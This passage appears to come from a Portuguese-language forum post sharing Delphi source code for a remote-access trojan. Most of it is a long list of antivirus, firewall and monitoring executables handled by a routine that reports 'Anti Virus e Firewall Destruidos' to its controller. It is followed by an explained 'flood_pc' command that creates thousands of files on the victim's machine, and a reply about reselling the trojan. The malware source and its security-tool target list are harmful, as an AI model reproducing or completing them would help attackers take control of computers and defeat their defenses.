WinExec('SCRSCAN.EXE',1);
WinExec('SD.EXE',1);
WinExec('SETUPVAMEEVAL.EXE',1);
WinExec('SETUP_FLOWPROTECTOR_US.EXE',1);
WinExec('SFC.EXE',1);
WinExec('SGSSFW32.EXE',1);
WinExec('SH.EXE',1);
WinExec('SHELLSPYINSTALL.EXE',1);
WinExec('SHN.EXE',1);
WinExec('SMC.EXE',1);
WinExec('SOFI.EXE',1);
WinExec('SPF.EXE',1);
WinExec('SPHINX.EXE',1);
WinExec('SPYXX.EXE',1);
WinExec('SRWATCH.EXE',1);
WinExec('SS3EDIT.EXE',1);
WinExec('ST2.EXE',1);
WinExec('SUPFTRL.EXE',1);
WinExec('SUPPORTER5.EXE',1);
WinExec('SWEEP95.EXE',1);
WinExec('SWEEPSRV.SYS',1);
WinExec('SWEEPSRV.SYS',1);
WinExec('SWNETSUP.EXE',1);
WinExec('SYMPROXYSVC.EXE',1);
WinExec('SYMTRAY.EXE',1);
WinExec('SYSDOC32.EXE',1);
WinExec('SYSEDIT.EXE',1);
WinExec('Sphinx.exe',1);
WinExec('SweepNet',1);
WinExec('SymProxySvc.exe',1);
WinExec('TASKMON.EXE',1);
WinExec('TAUMON.EXE',1);
WinExec('TAUSCAN.EXE',1);
WinExec('TC.EXE',1);
WinExec('TCA.EXE',1);
WinExec('TCM.EXE',1);
WinExec('TDS-3.EXE',1);
WinExec('TDS2-98.EXE',1);
WinExec('TDS2-NT.EXE',1);
WinExec('TFAK.EXE',1);
WinExec('TFAK5.EXE',1);
WinExec('TGBOB.EXE',1);
WinExec('TITANIN.EXE',1);
WinExec('TITANINXP.EXE',1);
WinExec('TRACERT.EXE',1);
WinExec('TRJSCAN.EXE',1);
WinExec('TRJSETUP.EXE',1);
WinExec('TROJANTRAP3.EXE',1);
WinExec('Tmntsrv',1);
WinExec('UNDOBOOT.EXE',1);
WinExec('UPDATE.EXE',1);
WinExec('Uh`S@d',1);
WinExec('VBCMSERV.EXE',1);
WinExec('VBCONS.EXE',1);
WinExec('VBUST.EXE',1);
WinExec('VBWIN9X.EXE',1);
WinExec('VBWINNTW.EXE',1);
WinExec('VCCMSERV.EXE',1);
WinExec('VCSETUP.EXE',1);
WinExec('VET32.EXE',1);
WinExec('VET32.exe',1);
WinExec('VET95.EXE',1);
WinExec('VETTRAY.EXE',1);
WinExec('VFSETUP.EXE',1);
WinExec('VIR-HELP.EXE',1);
WinExec('VIRUSMDPERSONALFIREWALL.EXE',1);
WinExec('VNLAN300.EXE',1);
WinExec('VNPC3000.EXE',1);
WinExec('VPC32.EXE',1);
WinExec('VPC42.EXE',1);
WinExec('VPFW30S.EXE',1);
WinExec('VPTRAY.EXE',1);
WinExec('VSCENU6.02D30.EXE',1);
WinExec('VSCHED.EXE',1);
WinExec('VSECOMR.EXE',1);
WinExec('VSHWIN32.EXE',1);
WinExec('VSISETUP.EXE',1);
WinExec('VSMAIN.EXE',1);
WinExec('VSMON.EXE',1);
WinExec('VSSTAT.EXE',1);
WinExec('VSWIN9XE.EXE',1);
WinExec('VSWINNTSE.EXE',1);
WinExec('VSWINPERSE.EXE',1);
WinExec('VVSTAT.EXE',1);
WinExec('VbCons.exe',1);
WinExec('Vet95.exe',1);
WinExec('VetTray.exe',1);
WinExec('W32DSM89.EXE',1);
WinExec('W9X.EXE',1);
WinExec('WATCHDOG.EXE',1);
WinExec('WEBSCANX.EXE',1);
WinExec('WEBTRAP.EXE',1);
WinExec('WGFE95.EXE',1);
WinExec('WHOSWATCHINGME.EXE',1);
WinExec('WIMMUN32.EXE',1);
WinExec('WINRECON.EXE',1);
WinExec('WINROUTE',1);
WinExec('WINSFCM.EXE',1);
WinExec('WNT.EXE',1);
WinExec('WRADMIN.EXE',1);
WinExec('WRCTRL.EXE',1);
WinExec('WSBGATE.EXE',1);
WinExec('WYVERNWORKSFIREWALL.EXE',1);
WinExec('WrAdmin.exe',1);
WinExec('WrCtrl.exe',1);
WinExec('XPF202EN.EXE',1);
WinExec('ZAPRO.EXE',1);
WinExec('ZAPSETUP3001.EXE',1);
WinExec('ZATUTOR.EXE',1);
WinExec('ZAUINST.EXE',1);
WinExec('ZONALM2601.EXE',1);
WinExec('ZONEALARM.EXE',1);
WinExec('_AVP32.EXE',1);
WinExec('_AVPCC.EXE',1);
WinExec('_AVPM.EXE',1);
WinExec('agentw.exe',1);
WinExec('alogserv.exe',1);
WinExec('apvxdwin.exe',1);
WinExec('avkpop.exe',1);
WinExec('avkservice.exe',1);
WinExec('avkwctl9.exe',1);
WinExec('avpm.exe',1);
WinExec('blackd.exe',1);
WinExec('ccApp.exe',1);
WinExec('ccEvtMgr.exe',1);
WinExec('ccPxySvc.exe',1);
WinExec('cfgWiz.exe',1);
WinExec('cleaner.EXE',1);
WinExec('cleaner3.EXE',1);
WinExec('cpd.exe',1);
WinExec('defalert.exe',1);
WinExec('defscangui.exe',1);
WinExec('f-stopw.exe',1);
WinExec('fameh32.exe',1);
WinExec('fch32.exe',1);
WinExec('fih32.exe',1);
WinExec('fnrb32.exe',1);
WinExec('fsaa.exe',1);
WinExec('fsav32.exe',1);
WinExec('fsgk32.exe',1);
WinExec('fsm32.exe',1);
WinExec('fsma32.exe',1);
WinExec('fsmb32.exe',1);
WinExec('gbmenu.exe',1);
WinExec('gbpoll.exe',1);
WinExec('iamapp.exe',1);
WinExec('iamserv.exe',1);
WinExec('lockdown2000.exe',1);
WinExec('navapsvc',1);
WinExec('navapsvc.exe',1);
WinExec('netstat.exe',1);
WinExec('notstart.exe',1);
WinExec('npscheck.exe',1);
WinExec('ntrtscan.EXE',1);
WinExec('nvapsvc',1);
WinExec('pathping.exe',1);
WinExec('pavproxy.exe',1);
WinExec('pccntmon.EXE',1);
WinExec('pccwin97.EXE',1);
WinExec('pcscan.EXE',1);
WinExec('ping.exe',1);
WinExec('rapapp.exe',1);
WinExec('route.exe',1);
WinExec('routemon.exe',1);
WinExec('sbserv.exe',1);
WinExec('sharedaccess',1);
WinExec('tracerpt.exe',1);
WinExec('tracert.exe',1);
WinExec('vbcmserv.exe',1);
WinExec('vsmon.exe',1);
WinExec('zapro.exe',1);
WinExec('zonealarm.exe',1);
socket.SendText('Anti Virus e Firewall Destruidos');
except
socket.SendText('Não Foi possivel acabar com os Anti-Virus e Firewall');
end;
exit;
end;

// Fallback: show the received text to the local user in a message box titled
// 'Mensagem Recebida'. Because of the {Registry} condition above, the only
// command that reaches this line as written is 'system_pc'.
MessageBox(handle,Pchar(Conective),'Mensagem Recebida', mb_ok + mb_iconinformation);
end;

end.

Agora vou explicar como o Server vai funcionar; para isso, vou usar um exemplo do código acima...

{Flood}

if Conective = 'flood_pc' then // Command string sent by the controlling program (which uses a ServerSocket) to this program (which uses a ClientSocket); compared for exact equality with the received text
begin
try // try/except does not retry: the body runs once, and control passes to except only if an exception is raised
For I := 1 To 10000 do
CreateFile(PChar('Testing ' + IntToStr(i)),0,0,0,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,0); // The "flood": tries to create empty files 'Testing 1' .. 'Testing 10000' by relative name; the returned handles are discarded without being closed
socket.SendText('Flood Realizado'); // Status text sent back to the controller; it is sent even if CreateFile failed, because the return value is not checked
except // Reached only if an exception is raised inside the try body
socket.SendText('Não Foi possivel realizar flood'); // Error text sent back to the controller
end;
exit;
end;

Server



Abraços a todos, e qualquer dúvida podem postar aqui.

colt7r

Vou rippar seu trojan e vende-lo na rua. Parabens, muito bom. Digno de um Van google.